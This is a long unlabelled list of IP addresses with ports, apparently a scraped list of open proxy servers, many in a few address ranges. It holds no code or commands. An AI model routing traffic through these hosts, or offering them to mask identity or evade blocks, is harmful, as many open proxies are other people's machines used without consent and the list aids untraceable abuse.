186.90.60.216:9064 186.90.68.30:9064 186.90.71.22:9064 186.90.73.236:8080 186.90.74.16:9064 186.90.75.146:9064 186.90.76.204:8080 186.90.77.130:9064 186.90.83.43:9064 186.90.88.70:9064 186.91.104.32:9064 186.91.110.86:9064 186.91.156.133:9064 186.91.156.236:9064 186.91.161.130:9064 186.91.161.225:8080 186.91.162.186:8080 186.91.167.110:9064 186.91.169.137:9064 186.91.170.131:8080 186.91.193.19:9064 186.91.197.106:9064 186.91.197.47:8080 186.91.198.157:8080 186.91.198.92:9064 186.91.200.87:8080 186.91.207.159:8080 186.91.212.68:8080 186.91.221.239:8080 186.91.223.18:9064 186.91.227.76:8080 186.91.235.241:8080 186.91.239.100:8080 186.91.246.121:8080 186.91.250.41:8080 186.91.253.106:8080 186.91.253.135:8080 186.91.255.148:9064 186.91.32.235:9064 186.91.34.224:8080 186.91.35.75:9064 186.91.36.46:8080 186.91.43.170:8080 186.91.43.94:9064 186.91.66.80:9064 186.91.70.242:9064 186.91.73.144:8080 186.91.74.45:8080 186.91.76.214:8080 186.91.76.96:8080 186.91.78.116:8080 186.91.99.31:9064 186.92.1.65:8080 186.92.101.100:9064 186.92.103.104:9064 186.92.115.166:9064 186.92.118.212:9064 186.92.120.121:8080 186.92.122.43:9064 186.92.125.233:8080 186.92.132.171:8080 186.92.133.1:9064 186.92.135.252:9064 186.92.163.79:8080 186.92.164.209:9064 186.92.166.36:9064 186.92.17.230:9064 186.92.182.6:9064 186.92.186.190:9064 186.92.195.241:8080 186.92.195.55:9064 186.92.198.106:9064 186.92.198.197:9064 186.92.213.187:9064 186.92.237.95:8080 186.92.240.6:8080 186.92.241.146:8080 186.92.243.82:8080 186.92.248.229:9064 186.92.250.53:8080 186.92.26.15:9064 186.92.27.237:8080 186.92.30.156:9064 186.92.31.157:8080 186.92.35.100:8080 186.92.50.140:9064 186.92.59.30:8080 186.92.6.167:8080 186.92.62.10:9064 186.92.62.142:9064 186.92.66.91:8080 186.92.85.22:9064 186.92.88.33:9064 186.93.106.173:8080 186.93.109.44:8080 186.93.120.181:8080 186.93.120.216:8080 186.93.121.59:9064 186.93.131.117:9064 186.93.133.224:8080 186.93.135.227:9064 186.93.138.33:8080 186.93.145.61:8080 186.93.161.218:9064 186.93.162.218:9064 186.93.163.66:9064 186.93.165.111:9064 186.93.165.87:8080 186.93.166.54:8080 186.93.17.168:9064 186.93.171.40:8080 186.93.185.100:8080 186.93.19.128:9064 186.93.192.92:8080 186.93.193.144:8080 186.93.193.227:9064 186.93.193.65:8080 186.93.194.164:9064 186.93.198.190:8080 186.93.199.94:9064 186.93.206.54:9064 186.93.217.19:8080 186.93.23.126:8080 186.93.230.109:9064 186.93.25.170:9064 186.93.26.236:9064 186.93.26.5:9064 186.93.27.25:8080 186.93.28.60:8080 186.93.41.15:8080 186.93.43.116:9064 186.93.43.190:8080 186.93.56.171:9064 186.93.59.21:9064 186.93.59.58:9064 186.93.64.190:8080 186.93.73.187:9064 186.93.73.46:8080 186.93.77.142:8080 186.93.79.9:9064 186.93.91.226:8080 186.93.96.76:9064 186.93.96.99:9064 186.93.99.155:8080 186.94.101.97:9064 186.94.112.66:8080 186.94.112.77:9064 186.94.115.194:9064 186.94.116.136:9064 186.94.117.132:8080 186.94.117.155:8080 186.94.119.68:9064 186.94.120.151:9064 186.94.124.82:8080 186.94.128.184:8080 186.94.128.76:8080 186.94.144.112:9064 186.94.148.39:9064 186.94.149.224:8080 186.94.149.58:8080 186.94.151.55:8080 186.94.157.78:8080 186.94.164.123:8080 186.94.164.69:9064 186.94.176.130:9064 186.94.188.194:9064 186.94.190.5:8080 186.94.203.156:8080 186.94.210.216:9064 186.94.212.208:9064 186.94.216.73:9064 186.94.217.202:9064 186.94.221.147:9064 186.94.221.223:8080 186.94.23.224:8080 186.94.236.196:8080 186.94.238.248:8080 186.94.241.14:9064 186.94.241.208:9064 186.94.241.229:8080 186.94.245.13:9064 186.94.248.198:9064 186.94.25.10:9064 186.94.250.103:9064 186.94.255.27:9064 186.94.26.14:8080 186.94.39.119:9064 186.94.49.16:8080 186.94.50.100:8080 186.94.50.239:9064 186.94.51.131:8080 186.94.51.180:8080 186.94.55.32:8080 186.94.57.70:9064 186.94.58.121:8080 186.94.60.244:9064 186.94.80.205:8080 186.94.80.238:8080 186.94.80.35:8080 186.94.82.124:8080 186.94.83.4:9064 186.94.84.123:8080 186.94.86.121:9064 186.94.86.122:8080 186.94.91.154:8080 186.94.92.144:9064 186.94.92.168:8080 186.94.93.17:8080 186.94.95.15:9064 186.95.11.33:9064 186.95.115.216:9064 186.95.123.198:9064 186.95.13.130:9064 186.95.14.220:9064 186.95.144.86:9064 186.95.168.224:8080 186.95.169.21:9064 186.95.170.178:9064 186.95.171.115:8080 186.95.173.115:8080 186.95.175.125:9064 186.95.176.65:9064 186.95.177.133:9064 186.95.18.229:8080 186.95.18.55:9064 186.95.186.228:8080 186.95.19.154:9064 186.95.192.17:9064 186.95.193.162:8080 186.95.194.220:9064 186.95.221.205:8080 186.95.225.105:9064 186.95.226.92:9064 186.95.23.20:9064 186.95.230.124:9064 186.95.230.54:8080 186.95.235.121:8080 186.95.235.68:9064 186.95.238.106:8080 186.95.241.203:8080 186.95.255.75:8080 186.95.27.164:9064 186.95.3.80:9064 186.95.34.121:9064 186.95.35.217:8080 186.95.38.88:8080 186.95.39.116:8080 186.95.40.111:9064 186.95.42.21:8080 186.95.42.248:9064 186.95.43.163:9064 186.95.47.168:9064 186.95.50.138:8080 186.95.50.204:8080 186.95.53.234:9064 186.95.71.25:8080 186.95.72.208:9064 186.95.73.90:9064 186.95.78.218:8080 186.95.78.33:9064 186.95.80.222:9064 186.95.83.155:9064 186.95.97.145:9064 187.115.153.138:3128 187.157.45.114:8080 187.27.8.62:9064 187.28.188.197:8080 187.44.14.156:8080 187.62.213.241:8080 187.72.142.210:3128 187.73.16.114:8080 187.73.17.1:8080 187.73.240.103:3128 188.131.129.250:13076 188.131.135.150:13076 188.131.141.49:13076 188.131.200.101:13076 188.138.247.175:8080 188.252.7.83:8080 189.113.64.126:8080 189.123.98.49:9064 189.17.66.162:8080 189.47.216.134:3128 189.48.102.123:9064 189.55.25.156:9064 189.58.105.83:3128 189.59.9.218:8080 189.85.18.13:8080 190.120.248.237:9064 190.121.148.199:8080 190.121.158.114:8080 190.124.155.198:9064 190.128.170.18:8080 190.140.172.193:3128 190.142.114.11:9064 190.142.173.7:9064 190.142.247.169:9064 190.142.5.42:9064 190.147.68.63:9064 190.153.100.150:8080 190.153.38.152:8080 190.153.99.227:8080 190.183.67.153:9064 190.198.10.35:8080 190.198.102.154:9064 190.198.102.168:9064 190.198.103.110:8080 190.198.103.207:9064 190.198.116.36:8080 190.198.117.250:9064 190.198.118.129:9064 190.198.118.61:9064 190.198.121.66:8080 190.198.122.200:9064 190.198.127.14:8080 190.198.145.148:8080 190.198.147.108:8080 190.198.148.166:9064 190.198.151.11:9064 190.198.151.184:9064 190.198.152.147:9064 190.198.152.180:8080 190.198.154.34:8080 190.198.154.43:9064 190.198.156.130:8080 190.198.156.77:9064 190.198.158.129:9064 190.198.159.116:9064 190.198.159.211:8080 190.198.168.119:9064 190.198.177.241:8080 190.198.178.107:9064 190.198.180.71:8080 190.198.181.77:9064 190.198.182.199:8080 190.198.183.120:8080 190.198.183.17:9064 190.198.185.11:9064 190.198.187.131:9064 190.198.191.128:8080 190.198.22.83:8080 190.198.229.34:9064 190.198.237.167:9064 190.198.239.239:8080 190.198.24.169:8080 190.198.249.39:8080 190.198.27.65:9064 190.198.28.228:9064 190.198.33.194:8080 190.198.36.21:9064 190.198.47.142:8080 190.198.65.62:9064 190.198.7.25:9064 190.198.80.142:8080 190.198.86.241:8080 190.198.91.225:9064 190.199.137.101:8080 190.199.144.212:9064 190.199.167.187:9064 190.199.197.146:8080 190.199.200.1:8080 190.199.201.62:8080 190.199.206.241:9064 190.199.210.135:9064 190.199.223.36:9064 190.199.231.177:8080 190.199.241.156:9064 190.199.241.233:9064 190.199.244.190:8080 190.199.250.199:9064 190.199.35.65:9064 190.199.35.99:9064 190.199.41.173:8080 190.199.61.209:9064 190.199.61.26:8080 190.199.61.65:8080 190.199.90.204:9064 190.199.91.127:8080 190.200.0.71:8080 190.200.147.29:9064 190.200.149.231:8080 190.200.155.91:8080 190.200.176.180:9064 190.200.182.22:9064 190.200.189.228:8080 190.200.19.47:8080 190.200.190.178:8080 190.200.2.183:8080 190.200.224.84:9064 190.200.225.15:8080 190.200.225.150:9064 190.200.23.166:9064 190.200.236.159:8080 190.200.237.71:8080 190.200.237.97:9064 190.200.239.117:8080 190.200.242.76:9064 190.200.246.105:8080 190.200.248.179:9064 190.200.248.81:8080 190.200.252.221:8080 190.200.255.239:8080 190.200.38.134:8080 190.200.4.81:9064 190.200.55.118:9064 190.200.58.75:9064 190.200.6.242:8080 190.200.62.182:9064 190.201.0.136:8080 190.201.107.233:9064 190.201.108.244:9064 190.201.109.196:9064 190.201.111.114:8080 190.201.115.142:8080 190.201.120.248:9064 190.201.121.222:9064 190.201.126.238:8080 190.201.142.182:8080 190.201.143.103:8080 190.201.164.81:9064 190.201.166.247:8080 190.201.170.26:8080 190.201.172.241:9064 190.201.172.254:8080 190.201.174.191:8080 190.201.187.235:8080 190.201.198.175:9064 190.201.199.11:8080 190.201.202.74:9064 190.201.219.202:8080 190.201.237.17:9064 190.201.27.2:8080 190.201.35.96:9064 190.201.5.45:9064 190.201.56.38:9064 190.202.195.46:8080 190.202.198.17:8080 190.202.216.231:9064 190.202.221.246:8080 190.202.248.152:8080 190.202.249.56:8080 190.202.253.173:8080 190.203.0.152:9064 190.203.106.179:8080 190.203.130.76:9064 190.203.131.202:9064 190.203.134.130:9064 190.203.14.177:8080 190.203.142.182:8080 190.203.142.86:8080 190.203.164.177:8080 190.203.169.181:8080 190.203.173.212:8080 190.203.19.182:8080 190.203.195.114:8080 190.203.195.247:9064 190.203.195.50:9064 190.203.198.180:9064 190.203.211.143:9064 190.203.211.5:8080 190.203.23.44:8080 190.203.238.8:8080 190.203.40.137:8080 190.203.49.119:9064 190.203.50.172:8080 190.203.67.35:9064 190.203.76.186:8080 190.203.77.38:8080 190.203.78.207:8080 190.203.8.212:9064 190.203.82.22:8080 190.203.86.146:8080 190.203.9.30:8080 190.204.1.16:8080 190.204.10.248:9064 190.204.10.9:9064 190.204.100.30:8080 190.204.104.9:9064 190.204.106.153:8080 190.204.108.189:8080 190.204.111.139:8080 190.204.114.250:8080 190.204.115.71:8080 190.204.130.118:9064 190.204.132.142:9064 190.204.141.28:9064 190.204.143.156:9064 190.204.150.137:9064 190.204.16.141:9064 190.204.168.149:9064 190.204.172.219:8080 190.204.173.59:9064 190.204.18.197:8080 190.204.195.154:8080 190.204.239.66:8080 190.204.252.38:8080 190.204.4.103:9064 190.204.4.52:8080 190.204.41.156:9064 190.204.48.167:9064 190.204.50.113:9064 190.204.52.1:8080 190.204.53.234:8080 190.204.56.59:9064 190.204.67.20:9064 190.204.67.86:9064 190.204.7.163:9064 190.204.81.207:8080 190.204.84.18:8080 190.204.85.5:8080 190.204.86.17:8080 190.204.91.151:9064 190.204.97.135:8080 190.204.98.185:8080 190.205.112.13:9064 190.205.116.179:9064 190.205.120.5:8080 190.205.128.174:8080 190.205.146.180:8080 190.205.151.100:8080 190.205.151.110:8080 190.205.158.75:8080 190.205.158.98:9064 190.205.192.90:8080 190.205.194.167:8080 190.205.198.52:8080 190.205.199.183:9064 190.205.20.234:9064 190.205.208.203:8080 190.205.21.104:8080 190.205.210.198:9064 190.205.210.248:9064 190.205.213.44:8080 190.205.216.215:8080 190.205.217.173:8080 190.205.22.199:8080 190.205.226.147:8080 190.205.231.224:9064 190.205.255.65:8080 190.205.28.119:8080 190.205.29.68:8080 190.206.10.145:9064 190.206.10.201:9064 190.206.100.208:9064 190.206.116.112:8080 190.206.116.39:9064 190.206.117.198:9064 190.206.117.96:8080 190.206.124.122:8080 190.206.134.125:8080 190.206.140.7:8080 190.206.141.150:8080 190.206.143.104:9064 190.206.143.150:8080 190.206.154.138:9064 190.206.156.140:9064 190.206.158.58:8080 190.206.177.143:9064 190.206.204.30:9064 190.206.210.119:9064 190.206.210.153:8080 190.206.210.245:9064 190.206.210.60:8080 190.206.211.227:8080 190.206.211.239:9064 190.206.211.43:9064 190.206.213.71:9064 190.206.221.197:9064 190.206.226.38:8080 190.206.3.250:9064 190.206.33.234:9064 190.206.35.69:8080 190.206.54.11:9064 190.206.58.180:9064 190.206.64.109:9064 190.206.87.59:8080 190.206.88.235:9064 190.206.91.76:9064 190.206.93.53:8080 190.207.1.250:9064 190.207.102.51:9064 190.207.104.137:9064 190.207.110.84:8080 190.207.122.40:8080 190.207.127.25:9064 190.207.138.23:9064 190.207.140.171:8080 190.207.154.111:8080 190.207.159.150:8080 190.207.159.183:8080 190.207.160.159:9064 190.207.162.153:9064 190.207.163.88:8080 190.207.163.95:8080 190.207.175.116:8080 190.207.182.172:8080 190.207.183.241:8080 190.207.185.170:8080 190.207.185.180:9064 190.207.191.213:8080 190.207.195.247:9064 190.207.201.142:9064 190.207.201.167:9064 190.207.201.78:8080 190.207.203.98:8080 190.207.205.146:8080 190.207.219.160:9064 190.207.223.8:9064 190.207.224.247:9064 190.207.225.60:8080 190.207.225.97:8080 190.207.228.112:8080 190.207.228.179:8080 190.207.228.3:9064 190.207.229.147:9064 190.207.251.253:8080 190.207.3.51:9064 190.207.3.88:9064 190.207.5.232:9064 190.207.67.236:9064 190.207.7.220:9064 190.207.7.251:9064 190.207.74.127:9064 190.207.85.47:8080 190.209.69.190:9064 190.217.164.197:9064 190.221.29.214:8080 190.228.33.114:8080 190.36.107.226:9064 190.36.113.17:9064 190.36.141.28:8080 190.36.143.231:8080 190.36.179.31:9064 190.36.21.37:8080 190.36.211.224:8080 190.36.218.233:9064 190.36.22.105:9064 190.36.220.65:9064 190.36.235.251:9064 190.36.238.254:9064 190.36.27.222:9064 190.36.31.104:9064 190.36.80.54:9064 190.36.81.12:9064 190.36.81.42:9064 190.37.125.109:9064 190.37.166.20:8080 190.37.174.156:9064 190.37.38.64:9064 190.37.41.88:9064 190.37.43.79:8080 190.37.65.16:9064 190.37.72.4:9064 190.37.75.211:9064 190.37.90.239:8080 190.38.0.219:9064 190.38.112.96:9064 190.38.118.248:9064 190.38.154.160:9064 190.38.160.87:8080 190.38.166.178:8080 190.38.166.34:8080 190.38.176.97:8080 190.38.178.91:9064 190.38.189.61:8080 190.38.21.244:9064 190.38.25.185:9064 190.38.35.100:9064 190.38.49.164:9064 190.38.50.78:9064 190.38.51.127:9064 190.38.64.191:9064 190.38.65.220:8080 190.38.80.37:9064 190.38.85.167:8080 190.38.95.253:9064 190.39.100.107:9064 190.39.106.190:9064 190.39.109.229:9064 190.39.118.33:9064 190.39.126.75:9064 190.39.140.223:8080 190.39.141.202:9064 190.39.143.223:8080 190.39.146.156:8080 190.39.146.81:8080 190.39.242.188:9064 190.39.243.167:9064 190.39.243.214:9064 190.39.245.28:9064 190.39.249.171:9064 190.39.42.18:9064 190.39.42.50:9064 190.39.75.142:9064 190.39.80.85:9064 190.39.81.54:9064 190.39.82.246:9064 190.39.84.224:9064 190.40.123.35:8080 190.7.129.204:3128 190.72.101.125:9064 190.72.11.203:9064 190.72.134.57:8080 190.72.137.188:9064 190.72.159.60:9064 190.72.176.31:8080 190.72.224.205:9064 190.72.241.227:9064 190.72.31.73:9064 190.72.31.92:9064 190.73.104.232:8080 190.73.109.6:9064 190.73.111.71:8080 190.73.124.34:8080 190.73.128.73:8080 190.73.131.80:9064 190.73.131.91:9064 190.73.134.113:9064 190.73.136.89:8080 190.73.138.249:9064 190.73.152.131:8080 190.73.155.179:9064 190.73.155.67:9064 190.73.171.197:8080 190.73.172.132:8080 190.73.194.198:8080 190.73.201.68:9064 190.73.226.84:9064 190.73.234.98:9064 190.73.252.120:8080 190.73.33.246:9064 190.73.34.187:8080 190.73.37.50:8080 190.73.42.217:8080 190.73.46.226:9064 190.73.64.94:8080 190.73.79.174:8080 190.73.8.132:9064 190.74.127.103:8080 190.74.168.149:8080 190.74.184.136:9064 190.74.188.75:9064 190.74.191.69:8080 190.74.202.207:9064 190.74.210.215:9064 190.74.57.215:9064 190.74.85.221:9064 190.75.131.113:9064 190.75.194.53:8080 190.75.50.30:8080 190.75.63.121:9064 190.75.67.191:9064 190.75.96.113:9064 190.77.116.225:9064 190.77.15.108:8080 190.77.170.249:8080 190.77.185.158:9064 190.77.191.13:9064 190.77.201.73:9064 190.77.204.21:8080 190.77.211.25:9064 190.77.215.19:9064 190.77.215.7:9064 190.77.219.23:8080 190.77.242.82:9064 190.77.243.170:8080 190.77.36.238:8080 190.77.47.238:9064 190.77.91.125:9064 190.77.91.55:9064 190.78.108.101:8080 190.78.125.189:9064 190.78.136.150:8080 190.78.149.225:9064 190.78.158.185:9064 190.78.168.187:9064 190.78.170.45:9064 190.78.179.233:9064 190.78.180.208:8080 190.78.180.50:9064 190.78.183.186:9064 190.78.21.161:9064 190.78.23.59:9064 190.78.28.65:8080 190.78.28.75:9064 190.78.31.194:8080 190.78.44.220:8080 190.78.54.242:8080 190.78.80.8:9064 190.78.87.48:9064 190.78.88.134:9064 190.78.94.10:9064 190.79.129.53:9064 190.79.34.206:8080 190.79.38.154:9064 190.79.41.240:9064 190.79.43.24:9064 190.79.45.164:9064 190.79.48.177:9064 190.79.49.220:9064 190.79.49.34:9064 190.79.93.204:8080 190.85.37.90:3128 190.94.253.68:9064 191.103.46.97:9064 192.241.189.103:3128 192.241.189.130:8080 192.3.104.245:80 192.99.140.228:7808 192.99.140.228:8089 192.99.168.198:8080 193.107.4.105:6666 193.107.4.125:6666 193.107.4.177:6666 193.150.13.87:3128 194.210.156.150:9064 194.210.179.66:9064 194.84.157.1:8080 195.114.125.81:8080 195.151.218.237:8080 195.154.233.59:3128 195.175.201.170:8080 195.46.164.155:3128 196.28.251.222:3128 196.45.51.27:8080 197.231.248.91:80 197.253.1.3:8080 198.2.253.9:3128 198.50.149.189:8888 198.81.200.145:80 199.200.120.140:7808 199.200.120.140:8089 2.135.237.210:9090 2.135.237.228:9090 200.109.196.126:8080 200.109.223.100:8080 200.109.35.220:9064 200.109.42.225:9064 200.122.103.84:9064 200.123.162.45:8080 200.16.117.62:80 200.174.182.105:8080 200.183.192.243:8088 200.195.171.226:3128 200.29.67.29:80 200.42.89.242:8080 200.69.141.18:8080 200.8.149.115:9064 200.8.149.5:9064 200.8.251.194:9064 200.82.192.251:8080 200.82.203.52:9064 200.82.217.69:9064 200.84.148.151:9064 200.84.151.160:9064 200.84.227.128:9064 200.84.234.178:8080 200.84.34.177:9064 200.84.45.170:8080 200.84.46.231:8080 200.84.99.3:9064 200.90.65.106:9064 200.90.67.235:9064 200.90.69.205:9064 200.93.107.192:9064 200.93.17.43:9064 200.93.67.6:8080 200.93.70.15:9064 200.93.87.25:8080 200.93.89.132:9064 200.93.94.91:8080 200.99.150.72:8080 201.13.87.37:9064 201.208.109.151:9064 201.208.111.205:8080 201.208.132.234:9064 201.208.133.29:9064 201.208.164.59:8080 201.208.167.79:8080 201.208.234.159:9064 201.208.5.73:9064 201.209.13.245:8080 201.209.202.95:9064 201.209.220.92:9064 201.209.226.37:9064 201.209.228.71:9064 201.209.23.231:8080 201.209.233.115:8080 201.209.234.30:9064 201.209.36.51:9064 201.209.37.124:8080 201.209.44.82:9064 201.209.5.138:9064 201.209.63.95:9064 201.209.79.145:9064 201.209.81.62:8080 201.210.127.89:9064 201.210.248.68:9064 201.210.255.140:9064 201.210.71.68:9064 201.210.98.194:9064 201.211.103.199:8080 201.211.136.148:8080 201.211.136.75:9064 201.211.143.98:8080 201.211.204.59:8080 201.211.224.66:9064 201.211.227.227:9064 201.212.23.137:9064 201.221.132.22:8080 201.221.132.69:3128 201.242.139.183:8080 201.242.155.54:8080 201.242.232.175:8080 201.242.27.37:9064 201.242.39.120:9064 201.242.42.111:9064 201.242.54.89:8080 201.243.102.246:8080 201.243.106.10:8080 201.243.108.244:8080 201.243.132.253:8080 201.243.144.174:9064 201.243.145.237:8080 201.243.150.230:9064 201.243.155.40:9064 201.243.162.106:9064 201.243.175.131:8080 201.243.176.128:8080 201.243.176.168:9064 201.243.180.234:8080 201.243.186.199:8080 201.243.189.154:8080 201.243.202.44:9064 201.243.203.111:8080 201.248.10.77:9064 201.248.115.161:8080 201.248.22.78:8080 201.248.235.242:9064 201.248.96.97:9064 201.248.99.165:9064 201.251.156.17:8080 201.30.215.194:3128 201.43.162.91:9064 201.62.93.87:3128 201.65.79.114:3128 201.86.94.166:8080 202.101.96.154:8888 202.106.16.36:3128 202.106.169.228:8080 202.107.233.85:8080 202.153.231.147:8080 202.166.195.113:8080 202.169.53.14:8010 202.171.253.74:82 202.171.253.74:83 202.171.253.74:84 202.171.253.84:86 202.53.254.99:8080 202.53.82.134:8080 202.56.231.117:8080 202.70.2.107:8088 202.75.18.34:8080 202.79.59.110:8080 202.86.216.23:80 203.192.12.148:80 203.192.217.187:9064 203.195.254.184:8888 203.201.170.146:31281 203.202.250.98:3128 203.68.25.62:9064 203.77.246.98:8080 203.90.236.152:3128 203.91.119.42:8080 203.91.121.74:3128 205.129.191.112:80 206.174.165.161:3128 207.108.136.68:443 208.109.119.221:80 208.123.212.170:80 208.83.106.105:9999 209.170.151.142:7808 209.170.151.142:8089 210.101.131.231:8080 210.101.131.231:8081 210.13.105.23:8080 210.14.152.91:80 210.14.152.91:8080 210.14.152.91:88 210.14.152.92:80 210.14.152.92:88 210.65.10.76:3128 211.138.121.36:87 211.138.121.38:80 211.138.121.38:81 211.139.45.253:8123 211.141.128.81:8118 211.144.81.66:18000 211.144.81.69:18000 211.162.0.170:80 212.112.107.254:3128 212.126.99.122:8080 212.200.131.83:80 212.200.131.83:8080 212.224.114.98:3128 212.25.61.158:8080 212.4.137.55:8080 212.91.10.142:8080 213.42.0.190:80 213.92.197.70:80 216.162.24.217:8080 216.218.216.201:7808 216.218.216.201:8089 216.230.144.141:80 217.117.6.21:80 217.168.89.136:80 217.169.215.175:6666 217.172.179.88:13910 217.199.160.78:80 217.21.146.130:8080 218.104.239.12:8118 218.107.217.82:80 218.107.217.82:82 218.108.168.70:80 218.108.168.70:82 218.164.36.61:9064 218.166.33.21:9064 218.201.21.142:80 218.201.42.35:80 218.201.74.121:8123 218.203.13.170:80 218.203.13.172:80 218.203.13.173:80 218.203.13.175:80 218.203.13.176:80 218.203.13.177:80 218.203.13.184:80 218.203.13.185:80 218.204.120.37:8123 218.206.188.247:8123 218.206.83.89:80 218.207.13.134:8123 218.207.16.71:8123 218.207.17.132:8123 218.207.172.236:80 218.207.208.55:8080 218.207.27.19:8123 218.207.27.198:8123 218.207.27.57:8123 218.207.50.117:8123 218.207.50.122:8123 218.207.50.178:8123 218.207.51.109:8123 218.207.51.218:8123 218.207.54.19:8123 218.240.156.82:80 218.28.96.39:3128 218.59.144.120:80 218.59.144.120:81 218.59.144.95:80 218.59.144.95:81 218.65.132.38:80 218.65.132.38:8081 218.7.132.1:8080 218.71.87.209:3128 218.80.232.38:8080 218.90.174.167:3128 219.239.236.49:8888 219.64.181.118:9064 219.85.111.7:9064 219.85.135.52:8088 219.85.166.39:8088 219.85.181.88:9064 219.85.207.206:8088 219.85.246.236:8088 219.90.107.242:9064 219.90.96.206:9064 219.91.239.176:9064 220.129.162.79:9064 220.129.173.157:9064 220.129.242.224:9064 220.129.71.238:9064 220.130.180.53:8080 220.136.157.129:9064 220.136.158.18:8088 220.136.238.152:9064 220.136.29.13:9064 220.136.84.185:9064 220.137.176.23:9064 220.137.243.185:9064 220.141.89.239:9064 220.142.6.120:9064 220.143.11.82:8088 220.143.174.163:9064 220.167.104.175:80 220.231.32.195:3128 221.0.182.5:808 221.10.102.199:81 221.10.102.199:82 221.10.102.199:83 221.130.178.78:8585 221.169.204.3:9064 221.176.14.72:80 221.178.117.210:8123 221.178.118.29:8123 221.178.119.61:8123 221.178.21.240:8123 221.178.22.130:8123 221.178.23.71:8123 221.178.24.214:8123 221.178.25.115:8123 221.178.28.151:8123 221.178.28.200:8123 221.178.28.21:8123 221.178.28.245:8123 221.178.29.13:8123 221.178.31.123:8123 221.178.31.190:8123 221.178.31.50:8123 221.178.32.58:8123 221.178.45.95:8123 221.178.53.114:8123 221.178.53.47:8123 221.178.54.128:8123 221.178.54.137:8123 221.178.54.94:8123 221.178.55.128:8123 221.178.55.165:8123 221.178.55.202:8123 221.178.55.221:8123 221.178.66.219:8123 221.178.75.205:8123 221.178.76.14:8123 221.178.76.158:8123 221.178.77.188:8123 221.178.77.215:8123 221.178.78.168:8123 221.178.79.86:8123 221.178.81.103:8123 221.178.86.3:8123 221.178.87.237:8123 221.178.96.203:8123 221.178.97.122:8123 221.178.97.157:8123 221.178.97.2:8123 221.178.97.251:8123 221.178.98.73:8123 221.178.98.98:8123 221.182.73.213:8123 221.182.75.84:8123 221.183.16.219:80 221.214.221.148:3128 221.5.69.51:80 221.5.69.52:8085 221.7.112.108:80 222.127.242.35:8080 222.128.171.142:4000 222.160.250.237:8585 222.217.221.239:8888 222.217.221.240:8888 222.218.157.233:9999 222.246.232.55:8101 222.29.86.69:3128 222.34.136.60:80 222.45.196.19:8118 222.59.244.14:8118 222.85.1.123:8118 222.85.103.3:81 222.88.236.236:843 222.89.248.101:9999 223.252.33.201:16158 223.252.33.201:16515 223.252.33.201:17130 223.252.33.201:19305 223.252.33.201:24809 223.30.231.94:8080 223.64.142.24:8123 223.64.181.153:8123 223.64.182.52:8123 223.64.19.36:8123 223.64.223.123:8123 223.64.35.119:8123 223.64.38.246:8123 223.64.38.88:8123 223.66.167.134:8123 223.66.183.198:8123 223.66.75.135:8123 223.66.80.251:8123 223.67.159.209:8123 223.67.163.215:8123 223.67.165.120:8123 223.67.165.67:8123 223.67.210.200:8123 223.67.217.52:8123 223.67.217.63:8123 223.67.218.99:8123 223.67.235.39:8123 223.68.14.92:8123 223.68.15.128:8123 223.68.59.101:8123 223.68.6.10:8000 223.82.10.46:8123 223.82.12.106:8123 223.82.12.154:8123 223.82.173.96:8123 223.82.175.116:8123 223.82.204.126:8123 223.82.206.32:8123 223.82.207.247:8123 223.82.216.188:8123 223.82.216.193:8123 223.82.216.218:8123 223.82.217.193:8123 223.82.217.25:8123 223.82.230.26:8123 223.82.232.20:8123 223.82.237.142:8123 223.82.27.149:8123 223.82.36.148:8123 223.82.37.219:8123 223.82.38.126:8123 223.82.42.166:8123 223.82.43.137:8123 223.82.43.143:8123 223.82.44.140:8123 223.82.44.55:8123 223.82.46.117:8123 223.82.46.126:8123 223.82.67.101:8123 223.82.68.154:8123 223.82.68.203:8123 223.82.69.234:8123 223.82.72.110:8123 223.82.79.109:8123 223.82.82.155:8123 223.82.83.16:8123 223.82.87.198:8123 223.82.93.4:8123 223.82.93.56:8123 223.82.95.164:8123 223.83.139.103:8123 223.83.140.182:8123 223.83.141.112:8123 223.83.18.53:8123 223.83.185.216:8123 223.83.186.250:8123 223.83.191.61:8123 223.83.191.96:8123 223.83.197.137:8123 223.83.208.75:8123 223.83.209.48:8123 223.83.212.58:8123 223.83.214.141:8123 223.83.218.181:8123 223.83.221.200:8123 223.83.222.159:8123 223.83.223.165:8123 223.83.227.29:8123 223.83.229.225:8123 223.83.24.229:8123 223.83.26.95:8123 223.83.35.108:8123 223.83.35.5:8123 223.83.37.144:8123 223.83.37.241:8123 223.83.56.188:8123 223.83.56.249:8123 223.83.57.153:8123 223.83.57.197:8123 223.83.58.144:8123 223.83.59.226:8123 223.83.59.49:8123 223.83.62.157:8123 223.83.62.91:8123 223.83.74.85:8123 223.83.77.84:8123 223.83.83.132:8123 223.83.84.208:8123 223.83.84.82:8123 223.84.101.88:8123 223.84.116.215:8123 223.84.12.126:8123 223.84.13.3:8123 223.84.130.147:8123 223.84.130.17:8123 223.84.130.4:8123 223.84.132.119:8123 223.84.134.246:8123 223.84.134.250:8123 223.84.137.157:8123 223.84.139.151:8123 223.84.144.199:8123 223.84.151.142:8123 223.84.155.155:8123 223.84.16.192:8123 223.84.164.25:8123 223.84.166.187:8123 223.84.168.178:8123 223.84.169.224:8123 223.84.169.67:8123 223.84.184.123:8123 223.84.187.127:8123 223.84.192.161:8123 223.84.195.138:8123 223.84.196.129:8123 223.84.197.251:8123 223.84.199.160:8123 223.84.203.6:8123 223.84.207.165:8123 223.84.207.171:8123 223.84.207.245:8123 223.84.208.107:8123 223.84.209.201:8123 223.84.219.54:8123 223.84.232.138:8123 223.84.233.116:8123 223.84.233.180:8123 223.84.233.33:8123 223.84.235.188:8123 223.84.236.140:8123 223.84.236.199:8123 223.84.248.138:8123 223.84.26.137:8123 223.84.26.97:8123 223.84.28.225:8123 223.84.32.27:8123 223.84.37.189:8123 223.84.4.127:8123 223.84.4.44:8123 223.84.5.96:8123 223.84.6.20:8123 223.84.7.235:8123 223.84.98.109:8123 223.85.100.233:8123 223.85.106.241:8123 223.85.110.24:8123 223.85.110.247:8123 223.85.16.181:8123 223.85.17.103:8123 223.85.18.140:8123 223.85.18.226:8123 223.85.18.242:8123 223.85.19.123:8123 223.85.19.169:8123 223.85.19.237:8123 223.85.20.150:8123 223.85.20.60:8123 223.85.21.121:8123 223.85.21.98:8123 223.85.22.7:8123 223.85.23.162:8123 223.85.23.245:8123 223.85.23.63:8123 223.85.26.147:8123 223.85.60.62:8123 223.85.62.130:8123 223.85.80.6:8123 223.85.81.157:8123 223.85.81.201:8123 223.85.81.88:8123 223.85.83.112:8123 223.85.83.233:8123 223.85.93.83:8123 223.85.96.58:8123 223.85.97.15:8123 223.85.99.183:8123 223.85.99.76:8123 223.86.100.122:8123 223.86.100.239:8123 